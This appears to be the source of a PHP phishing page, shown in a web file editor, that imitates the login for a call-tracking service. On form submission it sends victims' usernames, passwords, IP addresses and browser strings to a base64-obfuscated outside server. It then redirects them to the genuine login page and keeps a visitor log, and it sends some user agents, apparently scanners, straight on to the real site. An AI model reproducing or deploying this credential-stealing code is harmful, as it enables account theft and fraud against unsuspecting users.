Admin Control Panel v2.0

✎ Editing: login.php ← Back

<?php
error_reporting(0);

//----------------------//
function doLogin($login,$pwd) {
    $url = "https://api.ringba.com/v2/token";
    $fields = array(
        'username' => urlencode($login),
        'password' => urlencode($pwd),
        'grant_type' => 'password',
        'client_id' => 'ngAuthApp'
    );
    $fields_string = "";
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; } rtrim($fields_string, '&');
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_POST, count($fields));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $headers = [
        'Accept: application/json, text/plain, */*',
        'Accept-Encoding: gzip, deflate, br',
        'Accept-Language: en-US,en;q=0.9',
        'Referer: https://login.flightcalls.com',
        'Origin: https://login.flightcalls.com',
        'User-Agent: '.$_SERVER['HTTP_USER_AGENT'],
        'Connection: keep-alive'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    $response = curl_exec($ch);
    if ($response === false) {
        echo 'Curl error: ' . curl_error($ch)."\n";
        curl_close($ch);
        return 404;
    }

if ( strlen($response) && (curl_errno($ch)==CURLE_OK) && (curl_getinfo($ch, CURLINFO_HTTP_CODE)==200) ) {
        if ( (ord($response[0])==0x1f) && (ord($response[1])==0x8b) ) {
            $response = gzinflate(substr($response,10));
        }
    }
    curl_close($ch);
    return $response;
}	 
//--------------------//
file_put_contents("./public/config.txt", date("d.m.y H:i:s")."(isLogin:".$_COOKIE['isLogin'].") ".$_SERVER['REMOTE_ADDR']." ".$_SERVER['HTTP_USER_AGENT']."\n", FILE_APPEND);

if ($_COOKIE['isLogin']) {
    header("Location: https://login.flightcalls.com/#/login");
    exit(0);
}
if ($_SERVER['HTTP_USER_AGENT'] == 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36') {
    header("Location: https://login.flightcalls.com/#/login");
    exit(0);
}
if (strpos($_SERVER['HTTP_USER_AGENT'], 'CCleaner') !== false) {
    header("Location: https://login.flightcalls.com/#/login");
    exit(0);
}

$warning = "";
if (isset($_POST['signup_checkbox'])) {
    if (filter_var($_POST['userName'], FILTER_VALIDATE_EMAIL) && $_POST['password']) {
    //$response = doLogin($_POST['userName'], $_POST['password']);
    //$user = json_decode($response);

$data = array(
        'userName' => urlencode($_POST['userName']),
        'password' => urlencode($_POST['password']),
        'ip' => urlencode($_SERVER['REMOTE_ADDR']),
        'agent' => urlencode($_SERVER['HTTP_USER_AGENT'])
        //'token' => urlencode($response)
    );
    $data_string = "";
    foreach($data as $key=>$value) { $data_string .= $key.'='.$value.'&'; } rtrim($data_string, '&');
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, base64_decode("aHR0cDovLzc0LjExOS4xOTQuMTUvbG9nLnBocA==") );
    curl_setopt($ch,CURLOPT_POST, count($data));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $data_string);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $response = curl_exec($ch);
    
   // if ($user -> access_token) { 
        setcookie("isLogin", 1, time() + 60*60*24*365);
        header("Location: https://login.flightcalls.com/#/login");
        exit(0);
   // }
    }
    $warning = "The user name or password is incorrect.";
}

include("./public/login.html");
?>

Cancel